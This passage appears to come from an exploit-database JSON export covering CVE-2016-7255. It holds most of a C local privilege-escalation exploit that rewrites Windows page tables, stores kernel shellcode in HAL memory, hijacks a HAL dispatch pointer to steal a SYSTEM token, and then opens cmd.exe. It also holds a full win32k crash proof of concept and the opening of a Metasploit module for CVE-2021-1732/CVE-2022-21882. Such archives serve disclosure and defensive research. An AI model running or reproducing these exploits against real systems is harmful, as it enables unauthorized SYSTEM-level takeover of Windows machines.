*)PML4_SELF_REF; \nif ((value & 0x67) == 0x67) { \nprintf(\"Value Self Ref = %llx\\n\", value); \nbreak; \n} \n} \n__except (EXCEPTION_EXECUTE_HANDLER) { \ncontinue; \n} \n \n} \n \n \n} while (FALSE); 
\n \nif (NULL != hWndParent) \n{ \nDestroyWindow(hWndParent); \nhWndParent = NULL; \n} \n \nif (NULL != hWndChild) \n{ \nDestroyWindow(hWndChild); \nhWndChild = NULL; \n} \n \nUnregisterClassW(pszClassName, GetModuleHandleW(NULL)); \n \nreturn 0; \n} \n \nUINT64 get_pxe_address(UINT64 address) { \nUINT entry = PML4_SELF_REF_INDEX; \nUINT64 result = address >> 9; \nUINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39); \nUINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8; \nresult = result | lower_boundary; \nresult = result & upper_boundary; \nreturn result; \n} \n \nUINT64 look_free_entry_pml4(void) { \n// Looks for a free pml4e in the last 0x100 bytes of the PML4 \nint offset = 0xF00; \nUINT64 pml4_search = PML4_BASE + offset; \nwhile (offset < 0xFF8) \n{ \nif ((*(PVOID *)pml4_search) == 0x0) \n{ \n// This is a NULL (free) entry \nbreak; \n} \noffset += 8; \npml4_search = PML4_BASE + offset; \n} \nreturn pml4_search; \n} \n \nUINT64 calculate_spurious_pt_address(UINT64 spurious_offset) { \nUINT64 index = (spurious_offset & 0xFFF) / 8; \nUINT64 result = ( \n((UINT64)0xFFFF << 48) | \n((UINT64)PML4_SELF_REF_INDEX << 39) | \n((UINT64)PML4_SELF_REF_INDEX << 30) | \n((UINT64)PML4_SELF_REF_INDEX << 21) | \n(index << 12) \n); \nreturn result; \n} \n \n \n \nUINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) { \n \n/* \n1: kd> !pte ffffffff`ffd00000 \nVA ffffffffffd00000 \nPXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800 \ncontains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963 \npfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V \n*/ \n \nUINT64 pte = get_pxe_address(virtual_address); \nint pte_offset = pte & 0xFFF; \n//printf(\"PTE: %llx, %x\\n\", pte, pte_offset); \n \nUINT64 pde = get_pxe_address(pte); \nint pde_offset = 
pde & 0xFFF; \n//printf(\"PDE: %llx, %x\\n\", pde, pde_offset); \n \nUINT64 pdpte = get_pxe_address(pde); \nint pdpte_offset = pdpte & 0xFFF; \n//printf(\"PDPTE: %llx,%x\\n\", pdpte, pdpte_offset); \n \nUINT64 pml4e = get_pxe_address(pdpte); \nint pml4e_offset = pml4e & 0xFFF; \n//printf(\"PML4E: %llx\\n\", pml4e, pml4e_offset); \n \nUINT64 spurious_offset = look_free_entry_pml4(); \nprintf(\"[+] Selected spurious PML4E: %llx\\n\", spurious_offset); \nUINT64 f_e_pml4 = spurious_offset; \nUINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset); \nprintf(\"[+] Spurious PT: %llx\\n\", spurious_pt); \nprintf(\"--------------------------------------------------\\n\\n\"); \n \n \n//Read the physical address of pml4e \nUINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e); \nprintf(\"[+] Content pml4e %llx: %llx\\n\", pml4e, pml4e_pfn); \n// Change the PxE \npml4e_pfn = pml4e_pfn | 0x67; // Set U/S \n \nprintf(\"[+] Patching the Spurious Offset (PML4e) %llx: %llx\\n\",f_e_pml4, pml4e_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pdpte \nUINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset); \nprintf(\"[+] Content pdpte %llx: %llx\\n\", pdpte, pdpte_pfn); \n// Change the PxE \npdpte_pfn = pdpte_pfn | 0x67; // Set U/S \nprintf(\"[+] Patching the Spurious Offset (PDPTE) %llx: %llx\\n\", spurious_offset, pdpte_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical address of pde \nUINT64 pde_addr = spurious_pt + pde_offset; \nUINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset); \nprintf(\"[+] Content pdpe %llx: %llx\\n\", pde, pde_pfn); \n// Change the PxE \npde_pfn = pde_pfn | 0x67; // Set U/S \nprintf(\"[+] Patching the Spurious Offset (PDE) %llx: %llx\\n\", spurious_offset, pde_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pde_pfn; \nSleep(0x1); // Sleep for TLB refresh; \n \n//Read the physical 
address of pte \nUINT64 pte_addr = spurious_pt + pte_offset; \nUINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset); \nprintf(\"[+] Content pte %llx: %llx\\n\", pte, pte_pfn); \n// Change the PxE \npte_pfn = pte_pfn | 0x67; // Set U/S \npte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX \nif (patch_original) { \nprintf(\"*** Patching the original location to enable NX...\\n\"); \n*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn; \n} \n \nprintf(\"[+] Patching the Spurious Offset (PTE) %llx: %llx\\n\", spurious_offset, pte_pfn); \n*((PVOID *)spurious_offset) = (PVOID)pte_pfn; \nSleep(0x1); // Sleep for TLB refresh; \nprintf(\"\\n\\n\"); \nreturn spurious_pt; \n} \n \nUINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) { \nprintf(\"[*] Getting Overwrite pointer: %llx\\n\", target_address); \nUINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE); \nOverwriteAddress += (target_address & 0xFFF); \nprintf(\"OverwriteAddress: %llx\\n\", OverwriteAddress); \nreturn (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset)); \n} \n \nvoid overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) { \nUINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE); \nOverwriteTarget += (target_address & 0xFFF); \nUINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset; \nprintf(\"Patch OverwriteTarget: %llx with %llx\\n\", target, hook_address); \n*(PVOID *)target = (PVOID)hook_address; \n} \n \n \nUINT64 store_shellcode_in_hal(void) { \n//// Finally store the shellcode on the HAL \n \nUINT64 hal_heap_addr = 0xFFFFFFFFFFD00000; \nUINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE); \n \nprintf(\"HAL address: %llx\\n\", hal_heap); \n// 0xffffffffffd00d50 this is a good offset to store shellcode \n// 0xfff - 0xd50 = 0x2af space \n \nmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode)); \nreturn 
0xffffffffffd00d50; \n} \n \nUINT64 GetHalDispatchTable() { \nPCHAR KernelImage; \nSIZE_T ReturnLength; \nHMODULE hNtDll = NULL; \nUINT64 HalDispatchTable; \nHMODULE hKernelInUserMode = NULL; \nPVOID KernelBaseAddressInKernelMode; \nNTSTATUS NtStatus = STATUS_UNSUCCESSFUL; \nPSYSTEM_MODULE_INFORMATION pSystemModuleInformation; \n \nhNtDll = LoadLibrary(\"ntdll.dll\"); \n \nif (!hNtDll) { \nprintf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\"); \n \nif (!NtQuerySystemInformation) { \nprintf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength); \n \n// Allocate the Heap chunk \npSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), \nHEAP_ZERO_MEMORY, \nReturnLength); \n \nif (!pSystemModuleInformation) { \nprintf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nNtStatus = NtQuerySystemInformation(SystemModuleInformation, \npSystemModuleInformation, \nReturnLength, \n&ReturnLength); \n \nif (NtStatus != STATUS_SUCCESS) { \nprintf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nKernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base; \nKernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1; \n \nprintf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage); \nprintf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode); \n \nhKernelInUserMode = LoadLibraryA(KernelImage); \n \nif (!hKernelInUserMode) { \nprintf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \n// This is still 
in user mode \nHalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\"); \n \nif (!HalDispatchTable) { \nprintf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nelse { \nHalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode; \n \n// Here we get the address of HapDispatchTable in Kernel mode \nHalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode); \nprintf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable); \n} \n \nHeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation); \n \nif (hNtDll) { \nFreeLibrary(hNtDll); \n} \n \nif (hKernelInUserMode) { \nFreeLibrary(hKernelInUserMode); \n} \n \nhNtDll = NULL; \nhKernelInUserMode = NULL; \npSystemModuleInformation = NULL; \n \nreturn HalDispatchTable; \n} \n \nint __cdecl main(int argc, char** argv) \n{ \nTCHAR pre_username[256]; \nTCHAR post_username[256]; \nDWORD size = 256; \nULONG Interval = 0; \nHMODULE hNtDll = NULL; \nUINT retval; \nUINT64 overwrite_address; \nint overwrite_offset; \n \n// define operating system version specific variables \nunsigned char sc_KPROCESS; \nunsigned int sc_TOKEN; \nunsigned int sc_APLINKS; \nint osversion; \n \nif (argc != 2) { \nprintf(\"Please enter an OS version\\n\"); \nprintf(\"The following OS'es are supported:\\n\"); \nprintf(\"\\t[*] 7 - Windows 7\\n\"); \nprintf(\"\\t[*] 81 - Windows 8.1\\n\"); \nprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\"); \nprintf(\"\\t[*] 12 - Windows 2012 R2\\n\"); \nprintf(\"\\n\"); \nprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\"); \nreturn -1; \n} \n \nosversion = _strtoui64(argv[1], NULL, 10); \n \nif(osversion == 7) \n{ \n// the target machine's OS is Windows 7 SP1 \nprintf(\" [+] Windows 7 SP1\\n\"); \nsc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 
0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80) \nsc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = GetHalDispatchTable(); // HalDispatchTable \noverwrite_offset = 0x8; // QueryIntervalProfile \n} \nelse if(osversion == 81) \n{ \n// the target machine's OS is Windows 8.1 \nprintf(\" [+] Windows 8.1\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \nelse if(osversion == 10) \n{ \n// the target machine's OS is Windows 10 prior to build 14393 \nprintf(\" [+] Windows 10\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \nelse if(osversion == 12) \n{ \n// the target machine's OS is Windows 2012 R2 \nprintf(\" [+] Windows 2012 R2\\n\"); \nsc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS \nsc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60) \nsc_APLINKS = 0x2e8; 
// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY \n \noverwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController) \noverwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt) \n} \n// in case the OS version is not any of the previously checked versions \nelse \n{ \nprintf(\" [-] Unsupported version\\n\"); \nprintf(\" [*] Affected 64-bit operating systems\\n\"); \nprintf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\"); \nprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\"); \nprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\"); \nprintf(\" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\\n\"); \nreturn -1; \n} \n \nprintf(\"My PID is: %d\\n\", GetCurrentProcessId()); \nGetUserName(pre_username, &size); \nprintf(\"Current Username: %s\\n\", pre_username); \nprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF); \nprintf(\"Shellcode stored at: %p\\n\", (void *) &shellcode); \nprintf(\"Enter to continue...\\n\"); \ngetchar(); \n \ndo \n{ \nor_address_value_4((void*)PML4_SELF_REF); \n} while (FALSE); \n \nPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF); \nprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX); \nPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000); \n \nUINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset); \n \nprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer); \nDWORD pid = GetCurrentProcessId(); \n \n/* Shellcode Patching !! 
*/ \nchar *p = shellcode; \np += 4; // skip the CLI, PUSHF and MOV RAX bytes \n*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1 \n \np += 12; // Patch shellcode with original value in the Overwrite address \n*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset); \n \np += 12; // To patch the PID of our process \n \n*(DWORD *)p = (DWORD)pid; \n \np += 17; \n*(unsigned char *)p = (unsigned char)sc_KPROCESS; \n \np += 7; \n*(unsigned int *)p = (unsigned int)sc_APLINKS; \n \np += 20; \n*(unsigned int *)p = (unsigned int)sc_TOKEN; \n \np += 20; \n*(unsigned int *)p = (unsigned int)sc_TOKEN; \n \nUINT64 shellcode_va = store_shellcode_in_hal(); \nprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va); \noverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset); \n \nif (osversion == 7){ \n// Exploit Win7.1 \nhNtDll = LoadLibrary(\"ntdll.dll\"); \n \nif (!hNtDll) { \nprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \n \nNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\"); \n \nif (!NtQueryIntervalProfile) { \nprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError()); \nexit(EXIT_FAILURE); \n} \nNtQueryIntervalProfile(0x1337, &Interval); \n} \n \n \nwhile (1) { \nsize = 256; \nGetUserName(post_username, &size); \nif (memcmp(post_username, pre_username, 256) != 0) break; \n} \nSleep(2000); \nsystem(\"cmd.exe\"); \n \n \nreturn 0; \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/140468/ms16135-escalate.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:16:40", "description": "", "cvss3": {}, "published": "2016-11-14T00:00:00", "type": "packetstorm", "title": "Microsoft Windows kernel win32k Denial Of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": 
"2016-11-14T00:00:00", "id": "PACKETSTORM:139701", "href": "https://packetstormsecurity.com/files/139701/Microsoft-Windows-kernel-win32k-Denial-Of-Service.html", "sourceData": "`/* \nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255 \n \nFull Proof of Concept: \n \nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255 \nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40745.zip \n \n******************************************************************** \nCreated: 2016-11-09 14:23:09 \nFilename: main.c \nAuthor: root[at]TinySec.net \nVersion 0.0.0.1 \nPurpose: poc of cve-2016-0075 \n********************************************************************* \n*/ \n \n#include <windows.h> \n#include <wchar.h> \n#include <stdlib.h> \n#include <stdio.h> \n \n \n////////////////////////////////////////////////////////////////////////// \n#pragma comment(lib,\"ntdll.lib\") \n#pragma comment(lib,\"user32.lib\") \n \n#undef DbgPrint \nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... ); \nULONG __cdecl DbgPrint(__in char* Format, ...) 
\n{ \nCHAR* pszDbgBuff = NULL; \nva_list VaList=NULL; \nULONG ulRet = 0; \n \ndo \n{ \npszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR)); \nif (NULL == pszDbgBuff) \n{ \nbreak; \n} \nRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR)); \n \nva_start(VaList,Format); \n \n_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList); \n \nDbgPrintEx(77 , 0 , pszDbgBuff ); \nOutputDebugStringA(pszDbgBuff); \n \nva_end(VaList); \n \n} while (FALSE); \n \nif (NULL != pszDbgBuff) \n{ \nHeapFree( GetProcessHeap(), 0 , pszDbgBuff ); \npszDbgBuff = NULL; \n} \n \nreturn ulRet; \n} \n \n \nint _sim_key_down(WORD wKey) \n{ \nINPUT stInput = {0}; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = 0; \n \nSendInput(1 , &stInput , sizeof(stInput) ); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_key_up(WORD wKey) \n{ \nINPUT stInput = {0}; \n \ndo \n{ \nstInput.type = INPUT_KEYBOARD; \nstInput.ki.wVk = wKey; \nstInput.ki.dwFlags = KEYEVENTF_KEYUP; \n \nSendInput(1 , &stInput , sizeof(stInput) ); \n \n} while (FALSE); \n \nreturn 0; \n} \n \nint _sim_alt_shift_esc() \n{ \nint i = 0; \n \ndo \n{ \n_sim_key_down( VK_MENU ); \n_sim_key_down( VK_SHIFT ); \n \n \n_sim_key_down( VK_ESCAPE); \n_sim_key_up( VK_ESCAPE); \n \n_sim_key_down( VK_ESCAPE); \n_sim_key_up( VK_ESCAPE); \n \n_sim_key_up( VK_MENU ); \n_sim_key_up( VK_SHIFT ); \n \n \n} while (FALSE); \n \nreturn 0; \n} \n \n \n \nint _sim_alt_shift_tab(int nCount) \n{ \nint i = 0; \nHWND hWnd = NULL; \n \n \nint nFinalRet = -1; \n \ndo \n{ \n_sim_key_down( VK_MENU ); \n_sim_key_down( VK_SHIFT ); \n \n \nfor ( i = 0; i < nCount ; i++) \n{ \n_sim_key_down( VK_TAB); \n_sim_key_up( VK_TAB); \n \nSleep(1000); \n \n} \n \n \n_sim_key_up( VK_MENU ); \n_sim_key_up( VK_SHIFT ); \n} while (FALSE); \n \nreturn nFinalRet; \n} \n \n \n \nint or_address_value_4(__in void* pAddress) \n{ \nWNDCLASSEXW stWC = {0}; \n \nHWND hWndParent = NULL; \nHWND hWndChild = NULL; \n \nWCHAR* pszClassName 
= L\"cve-2016-7255\"; \nWCHAR* pszTitleName = L\"cve-2016-7255\"; \n \nvoid* pId = NULL; \nMSG stMsg = {0}; \n \ndo \n{ \n \nstWC.cbSize = sizeof(stWC); \nstWC.lpfnWndProc = DefWindowProcW; \nstWC.lpszClassName = pszClassName; \n \nif ( 0 == RegisterClassExW(&stWC) ) \n{ \nbreak; \n} \n \nhWndParent = CreateWindowExW( \n0, \npszClassName, \nNULL, \nWS_OVERLAPPEDWINDOW|WS_VISIBLE, \n0, \n0, \n360, \n360, \nNULL, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndParent) \n{ \nbreak; \n} \n \nhWndChild = CreateWindowExW( \n0, \npszClassName, \npszTitleName, \nWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD, \n0, \n0, \n160, \n160, \nhWndParent, \nNULL, \nGetModuleHandleW(NULL), \nNULL \n); \n \nif (NULL == hWndChild) \n{ \nbreak; \n} \n \n#ifdef _WIN64 \npId = ( (UCHAR*)pAddress - 0x28 ); \n#else \npId = ( (UCHAR*)pAddress - 0x14); \n#endif // #ifdef _WIN64 \n \nSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId ); \n \nDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild); \nDebugBreak(); \n \nShowWindow(hWndParent , SW_SHOWNORMAL); \n \nSetParent(hWndChild , GetDesktopWindow() ); \n \nSetForegroundWindow(hWndChild); \n \n_sim_alt_shift_tab(4); \n \nSwitchToThisWindow(hWndChild , TRUE); \n \n_sim_alt_shift_esc(); \n \n \nwhile( GetMessage(&stMsg , NULL , 0 , 0) ) \n{ \nTranslateMessage(&stMsg); \nDispatchMessage(&stMsg); \n} \n \n \n} while (FALSE); \n \nif ( NULL != hWndParent ) \n{ \nDestroyWindow(hWndParent); \nhWndParent = NULL; \n} \n \nif ( NULL != hWndChild ) \n{ \nDestroyWindow(hWndChild); \nhWndChild = NULL; \n} \n \nUnregisterClassW(pszClassName , GetModuleHandleW(NULL) ); \n \nreturn 0; \n} \n \nint __cdecl wmain(int nArgc, WCHAR** Argv) \n{ \ndo \n{ \nor_address_value_4( (void*)0xFFFFFFFF ); \n} while (FALSE); \n \nreturn 0; \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139701/ms16135-dos.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": 
"2022-02-28T19:38:43", "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "zdt", "title": "Win32k ConsoleControl Offset Confusion / Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-28T00:00:00", "id": "1337DAY-ID-37433", 
"href": "https://0day.today/exploit/description/37433", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/local/cve_2021_1732_win32k'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k ConsoleControl Offset Confusion',\n 'Description' => %q{\n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause\n is the same for both vulnerabilities. 
This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n # CVE-2021-1732\n 'BITTER APT', # exploit as used in the wild\n 'JinQuan', # detailed analysis\n 'MaDongZe', # detailed analysis\n 'TuXiaoYi', # detailed analysis\n 'LiHao', # detailed analysis\n # CVE-2022-21882\n 'L4ys', # github poc\n # both CVEs\n 'KaLendsi', # github pocs\n # Metasploit exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n # CVE-2021-1732 references\n [ 'CVE', '2021-1732' ],\n [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],\n [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],\n [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],\n # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit\n [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],\n [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],\n [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],\n [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],\n # CVE-2022-21882 references\n [ 'CVE', '2022-21882' ],\n [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]\n ],\n 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date\n 
